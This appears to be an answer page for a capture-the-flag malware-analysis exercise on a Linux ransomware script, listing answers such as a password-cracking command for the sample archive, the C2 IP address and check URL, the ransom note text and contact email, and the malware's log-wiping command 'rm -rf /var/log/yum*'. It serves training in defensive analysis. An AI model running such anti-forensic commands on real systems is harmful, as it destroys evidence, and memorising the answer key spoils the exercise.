Malware Analysis - Ransomware Script

What is the malicious IP address referenced multiple times in the script? (1 points)

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u 'Recovered Script File.zip'
185.141.25.168

The script uses apt-get to retrieve two tools, and uses yum to install them. What is the command line to remove the yum logs afterwards? (1 points)

rm -rf /var/log/yum*

A message is created in the file /etc/motd. What are the three first words? (1 points)

you were hacked

This message also contains a contact email address to have the system fixed. What is it? (1 points)

nationalsiense@protonmail.com

When files are encrypted, an unusual file extension is used. What is it? (2 points)

.☢

There are 5 functions associated with the encryption process that start with ‘encrypt’. What are they, in the order they’re presented in the script? (do not include "()") (2 points)

encrypt_ssh, encrypt_grep_files, encrypt_home, encrypt_root, encrypt_db

The script will check a text file hosted on the C2 server. What is the full URL of this file? (2 points)

http://185.141.25.168/check_attack/0.txt

PreviousMelissa NextSuspicious USB Stick

Last updated 4 years ago

Was this helpful?